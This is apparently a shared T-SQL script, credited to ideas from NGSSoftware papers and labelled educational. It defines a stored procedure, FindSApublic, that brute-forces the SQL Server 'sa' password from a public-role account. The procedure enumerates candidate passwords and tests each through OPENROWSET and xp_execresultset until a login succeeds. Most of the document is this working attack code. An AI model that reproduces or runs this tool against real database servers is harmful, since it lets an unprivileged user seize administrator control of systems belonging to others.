Find SA password with public role-perm test DBA
Find SA Password (Brute Force) with Public Role
FindSApublic is a brute-force password cracker that requires only public role.
Possibilities returns how many different passwords are possible with 1 up to c characters from a universe of n different characters.
Usage:
FindSApublic n
N is an integer which is the maximum length of the password to attempt cracking.
Acknowledgments
original idea:
David Litchfield
david@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you David, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/cracking-sql-passwords.pdf
original idea and code:
Chris Anley
chris@ngssoftware.com
Next Generation Security Software Ltd ©
http://www.nextgenss.com/
Thank you Chris, for sharing your report and allowing me to use it for my educational test code.
Highly recomended reading:
http://www.nextgenss.com/papers/advanced_sql_injection.pdf
This code is provided as is and for educational purposes only.
Developed, adapted or translated to TSQL by Joseph Gama.
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS OFF
GO
CREATE function Possibilities (@c bigint, @n bigint)
--returns how many different passwords are possible with 1 up to c characters from a universe
--of n different characters
returns bigint
as
BEGIN
declare @i bigint, @result bigint
set @i=1
set @result=0
while @i<=@c
BEGIN
set @result=@result+power(@n,@i)
set @i=@i+1
END
RETURN @result
END
GO
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS OFF
GO
CREATE PROCEDURE FindSApublic (@size int)
AS
SET NOCOUNT ON
DECLARE @query NVARCHAR(255),@i int,@j int,@n int,@max int,@temp int, @keys VARCHAR(50), @dtime datetime, @s VARCHAR(10), @t VARCHAR(10)
SET @dtime=getdate()
SET @keys='ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!_'
SET @max=test.dbo.Possibilities( @size, LEN(@keys))
SET @n=len(@keys)
SET @s='A'
SET @i=0
create table ##temppwd (pwd NVARCHAR(10))
WHILE @i<@max
BEGIN
SET @j=@i
WHILE (@j>0)
BEGIN
SET @temp=@j % (@n)-sign(len(@s))
if @temp<0 set @temp=@n-1
SET @j=@j /(@n+sign(len(@s)))
SET @s=substring(@keys,@temp+1,1)+@s
SET @t=@s
END
print @s
declare @s1 NVARCHAR(10) set @s1=CONVERT(NVARCHAR(10),@s)
--set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' FROM OPENDATASOURCE(''''SQLOLEDB'''',''''Data Source='+@@SERVERNAME+N';User ID=sa;Password='+@s1+N''''').master.dbo.sysobjects '''
set @query=N'select ''insert ##temppwd select top 1 '''''+@s1+N''''' from OPENROWSET(''''MSDASQL'''',''''DRIVER={SQL Server};SERVER=;uid=sa;pwd='+@s1+N''''',''''select 1 '''')'''
exec master..xp_execresultset @query,N'master'
if EXISTS(select * from ##temppwd)
GOTO lblFound
SET @s=''
SET @i=@i+1
END
drop table ##temppwd
select 'Not found after '+str(@max)+' rounds, up to '+@t+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
lblFound:
drop table ##temppwd
select 'Found: '+@s+' in '+CONVERT(varchar(255),datediff(n,@dtime,getdate()))+' minutes'
return
GO
SET QUOTED_IDENTIFIER OFF
GO
SET ANSI_NULLS ON
GO